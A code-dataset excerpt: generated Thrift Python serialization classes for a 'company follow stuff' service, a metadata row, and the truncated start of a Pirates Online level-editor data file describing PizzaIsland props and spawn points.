return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_stuff_detail_result)
get_stuff_detail_result.thrift_spec = (
(0, TType.STRUCT, 'success', [stuff_detail, None], None, ), # 0
(1, TType.STRUCT, 'e', [gen_exp, None], None, ), # 1
)
class add_company_follow_stuff_args(object):
"""
Attributes:
- company_name
- type_id
- ssid
"""
def __init__(self, company_name=None, type_id=None, ssid=None,):
self.company_name = company_name
self.type_id = type_id
self.ssid = ssid
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.company_name = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.type_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('add_company_follow_stuff_args')
if self.company_name is not None:
oprot.writeFieldBegin('company_name', TType.STRING, 1)
oprot.writeString(self.company_name.encode('utf-8') if sys.version_info[0] == 2 else self.company_name)
oprot.writeFieldEnd()
if self.type_id is not None:
oprot.writeFieldBegin('type_id', TType.I64, 2)
oprot.writeI64(self.type_id)
oprot.writeFieldEnd()
if self.ssid is not None:
oprot.writeFieldBegin('ssid', TType.STRING, 3)
oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(add_company_follow_stuff_args)
add_company_follow_stuff_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'company_name', 'UTF8', None, ), # 1
(2, TType.I64, 'type_id', None, None, ), # 2
(3, TType.STRING, 'ssid', 'UTF8', None, ), # 3
)
class add_company_follow_stuff_result(object):
"""
Attributes:
- success
- e
"""
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = gen_exp.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('add_company_follow_stuff_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(add_company_follow_stuff_result)
add_company_follow_stuff_result.thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', [gen_exp, None], None, ), # 1
)
class cancle_company_follow_stuff_args(object):
"""
Attributes:
- company_name
- type_id
- ssid
"""
def __init__(self, company_name=None, type_id=None, ssid=None,):
self.company_name = company_name
self.type_id = type_id
self.ssid = ssid
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.company_name = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.type_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('cancle_company_follow_stuff_args')
if self.company_name is not None:
oprot.writeFieldBegin('company_name', TType.STRING, 1)
oprot.writeString(self.company_name.encode('utf-8') if sys.version_info[0] == 2 else self.company_name)
oprot.writeFieldEnd()
if self.type_id is not None:
oprot.writeFieldBegin('type_id', TType.I64, 2)
oprot.writeI64(self.type_id)
oprot.writeFieldEnd()
if self.ssid is not None:
oprot.writeFieldBegin('ssid', TType.STRING, 3)
oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(cancle_company_follow_stuff_args)
cancle_company_follow_stuff_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'company_name', 'UTF8', None, ), # 1
(2, TType.I64, 'type_id', None, None, ), # 2
(3, TType.STRING, 'ssid', 'UTF8', None, ), # 3
)
class cancle_company_follow_stuff_result(object):
"""
Attributes:
- success
- e
"""
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = gen_exp.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('cancle_company_follow_stuff_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(cancle_company_follow_stuff_result)
cancle_company_follow_stuff_result.thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', [gen_exp, None], None, ), # 1
)
class get_follow_stuff_by_company_args(object):
"""
Attributes:
- company_name
"""
def __init__(self, company_name=None,):
self.company_name = company_name
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.company_name = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_follow_stuff_by_company_args')
if self.company_name is not None:
oprot.writeFieldBegin('company_name', TType.STRING, 1)
oprot.writeString(self.company_name.encode('utf-8') if sys.version_info[0] == 2 else self.company_name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_follow_stuff_by_company_args)
get_follow_stuff_by_company_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'company_name', 'UTF8', None, ), # 1
)
class get_follow_stuff_by_company_result(object):
"""
Attributes:
- success
- e
"""
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype136, _size133) = iprot.readListBegin()
for _i137 in range(_size133):
_elem138 = stuff_detail()
_elem138.read(iprot)
self.success.append(_elem138)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = gen_exp.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_follow_stuff_by_company_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter139 in self.success:
iter139.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_follow_stuff_by_company_result)
get_follow_stuff_by_company_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT, [stuff_detail, None], False), None, ), # 0
(1, TType.STRUCT, 'e', [gen_exp, None], None, ), # 1
)
class get_follow_company_by_stuff_args(object):
"""
Attributes:
- type_id
- ssid
"""
def __init__(self, type_id=None, ssid=None,):
self.type_id = type_id
self.ssid = ssid
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.type_id = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_follow_company_by_stuff_args')
if self.type_id is not None:
oprot.writeFieldBegin('type_id', TType.I64, 1)
oprot.writeI64(self.type_id)
oprot.writeFieldEnd()
if self.ssid is not None:
oprot.writeFieldBegin('ssid', TType.STRING, 2)
oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_follow_company_by_stuff_args)
get_follow_company_by_stuff_args.thrift_spec = (
None, # 0
(1, TType.I64, 'type_id', None, None, ), # 1
(2, TType.STRING, 'ssid', 'UTF8', None, ), # 2
)
class get_follow_company_by_stuff_result(object):
"""
Attributes:
- success
- e
"""
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype143, _size140) = iprot.readListBegin()
for _i144 in range(_size140):
_elem145 = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
self.success.append(_elem145)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = gen_exp.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_follow_company_by_stuff_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter146 in self.success:
oprot.writeString(iter146.encode('utf-8') if sys.version_info[0] == 2 else iter146)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_follow_company_by_stuff_result)
get_follow_company_by_stuff_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING, 'UTF8', False), None, ), # 0
(1, TType.STRUCT, 'e', [gen_exp, None], None, ), # 1
)
class get_related_stuff_args(object):
"""
Attributes:
- ssid
"""
def __init__(self, ssid=None,):
self.ssid = ssid
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.ssid = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_related_stuff_args')
if self.ssid is not None:
oprot.writeFieldBegin('ssid', TType.STRING, 1)
oprot.writeString(self.ssid.encode('utf-8') if sys.version_info[0] == 2 else self.ssid)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_related_stuff_args)
get_related_stuff_args.thrift_spec = (
None, # 0
(1, TType.STRING, 'ssid', 'UTF8', None, ), # 1
)
class get_related_stuff_result(object):
"""
Attributes:
- success
- e
"""
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype150, _size147) = iprot.readListBegin()
for _i151 in range(_size147):
_elem152 = iprot.readString().decode('utf-8', errors='replace') if sys.version_info[0] == 2 else iprot.readString()
self.success.append(_elem152)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = gen_exp.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('get_related_stuff_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter153 in self.success:
oprot.writeString(iter153.encode('utf-8') if sys.version_info[0] == 2 else iter153)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(get_related_stuff_result)
get_related_stuff_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING, 'UTF8', False), None, ), # 0
(1, TType.STRUCT, 'e', [gen_exp, None], None, ), # 1
)
fix_spec(all_structs)
del all_structs
| 34.915115 | 144 | 0.593993 | 7,127 | 63,755 | 5.028062 | 0.030167 | 0.015488 | 0.027878 | 0.023106 | 0.938719 | 0.914748 | 0.894907 | 0.866053 | 0.840547 | 0.829357 | 0 | 0.008846 | 0.304902 | 63,755 | 1,825 | 145 | 34.934247 | 0.799779 | 0.018681 | 0 | 0.834624 | 1 | 0 | 0.043634 | 0.013261 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109782 | false | 0.00563 | 0.00563 | 0.033779 | 0.209008 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ea80d6d1fc1d242a9170a055d0d9677271ce2e2e | 23,503 | py | Python | pirates/leveleditor/worldData/PizzaIsland.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 81 | 2018-04-08T18:14:24.000Z | 2022-01-11T07:22:15.000Z | pirates/leveleditor/worldData/PizzaIsland.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 4 | 2018-09-13T20:41:22.000Z | 2022-01-08T06:57:00.000Z | pirates/leveleditor/worldData/PizzaIsland.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 26 | 2018-05-26T12:49:27.000Z | 2021-09-11T09:11:59.000Z | from pandac.PandaModules import Point3, VBase3, Vec4
objectStruct = {'AmbientColors': {},'DirectionalColors': {},'FogColors': {},'FogRanges': {},'Interact Links': [],'Locator Links': [['1157477467.36dxschafe', '1234560512.0akelts2', 'Bi-directional'], ['1234560512.0akelts3', '1235762221.72akelts', 'Bi-directional']],'Objects': {'1150922126.8dzlu': {'Type': 'Island','Name': 'PizzaIsland','File': '','Minimap': False,'Objects': {'1155695180.13sdnaik': {'Type': 'Port Collision Sphere','Name': 'PizzaPort','Hpr': VBase3(34.116, 0.0, 0.0),'Pos': Point3(2.887, 0.249, 0.0),'Scale': VBase3(125.209, 125.209, 125.209),'VisSize': '','Visual': {'Color': (0.5, 0.5, 1.0, 0.2),'Model': 'models/misc/smiley'}},'1160703177.58JB': {'Type': 'Interactive Prop','Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-416.357, -1826.094, 4.65),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Model': 'models/props/dummy_zero'},'interactAble': 'player','interactType': 'hit'},'1162575677.17Shochet': {'Type': 'Locator Node','Name': 'portal_exterior_2','Hpr': VBase3(-42.929, -1.491, 2.305),'Parent Uid': '1150922126.8dzlu','Pos': Point3(12.838, -924.207, 46.228),'Scale': VBase3(1.0, 1.0, 1.0)},'1168493928.34kmuller': {'Type': 'Prop_Groups','DisableCollision': True,'GridPos': Point3(-1468.164, -3010.376, 193.197),'Hpr': VBase3(-156.501, 0.0, 0.0),'Pos': Point3(-729.161, -1976.411, 68.319),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (0.47999998927116394, 0.44999998807907104, 0.4099999964237213, 1.0),'Model': 'models/props/prop_group_A'}},'1169577216.0dxschafe0': {'Type': 'Locator Node','Name': 'portal_exterior_3','Hpr': VBase3(175.735, 0.0, 0.0),'Parent Uid': '1150922126.8dzlu','Pos': Point3(758.091, -1814.26, 10.14),'Scale': VBase3(1.0, 1.0, 1.0)},'1172542336.0jubutler8': {'Type': 'Player Spawn Node','Hpr': VBase3(-26.668, 0.0, 0.0),'Index': -1,'Min Population': '1','Pos': Point3(1.452, -0.761, 1.0),'Priority': '1','Scale': VBase3(1.0, 1.0, 1.0),'SpawnDelay': '20','Spawnables': 'All','Team': '1','Visual': {'Model': 'models/misc/smiley'},'startingDepth': '12'},'1178941184.0JB': {'Type': 'Player Boot Node','AreaUid': '1157485774.64sdnaik','Hpr': VBase3(168.961, 0.0, 0.0),'Pos': Point3(-739.589, -1823.109, 25.99),'Scale': VBase3(1.0, 1.0, 1.0),'Visual': {'Color': (0.5, 1.0, 0.5, 1),'Model': 'models/misc/smiley'}},'1192581038.5akelts': {'Type': 'Military_props','DisableCollision': False,'Hpr': VBase3(116.029, 0.0, 0.0),'Pos': Point3(-733.366, -1970.781, 68.319),'Scale': VBase3(1.0, 1.0, 1.104),'Visual': {'Color': (0.69, 0.58, 0.47, 1.0),'Model': 'models/islands/pier_scaffold_stairs'}},'1193359744.0dxschafe0': {'Type': 'Spawn Node','AnimSet': 'default','Hpr': Point3(0.0, 0.0, 0.0),'Min Population': '1','Patrol Radius': '12.0000','Pause Chance': '100','Pause Duration': '30','Pos': Point3(0.0, 0.0, 0.0),'PoseAnim': '','PoseFrame': '','Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'Low Navy','Start State': 'Patrol','StartFrame': '0','Team': 'default','TrailFX': 'None','Visual': {'Color': (0, 0, 0.65, 1),'Model': 'models/misc/smiley'}},'1219967635.89akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-20.048, -67.875, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967645.94akelts': {'Type': 'Food','DisableCollision': False,'Hpr': Point3(0.0, 0.0, 0.0),'Pos': Point3(-10.749, -22.183, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisSize': '','VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967701.58akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-52.08, -53.96, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967702.73akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-68.535, -13.929, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967703.58akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-33.426, -9.466, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967706.25akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-40.058, -36.711, 1.0),'Scale': VBase3(3.002, 3.002, 3.002),'VisZone': 'sausage','Visual': {'Model': 'models/props/sausage'}},'1219967754.09akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(12.883, -9.472, 1.0),'Scale': VBase3(18.722, 18.722, 18.722),'VisZone': 'pepperoni','Visual': {'Model': 'models/props/greenbeanbasket'}},'1219967765.61akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(42.531, 20.561, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967783.2akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(15.71, 14.133, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisSize': '','VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967783.72akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(24.93, 63.03, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisSize': '','VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967784.53akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(21.517, 36.79, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisSize': '','VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967786.83akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(54.018, 61.648, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'mushroom','Visual': {'Model': 'models/props/fishbasket'}},'1219967791.12akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-14.676, 21.936, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisSize': '','VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967800.16akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-26.679, 23.72, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967801.34akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-9.565, 36.257, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967801.8akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-61.911, 39.33, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 'models/props/mangobasket'}},'1219967802.26akelts': {'Type': 'Food','DisableCollision': False,'Hpr': VBase3(-36.908, 0.0, 0.0),'Pos': Point3(-64.449, 10.839, 1.0),'Scale': VBase3(16.691, 16.691, 16.691),'VisZone': 'pineapple','Visual': {'Model': 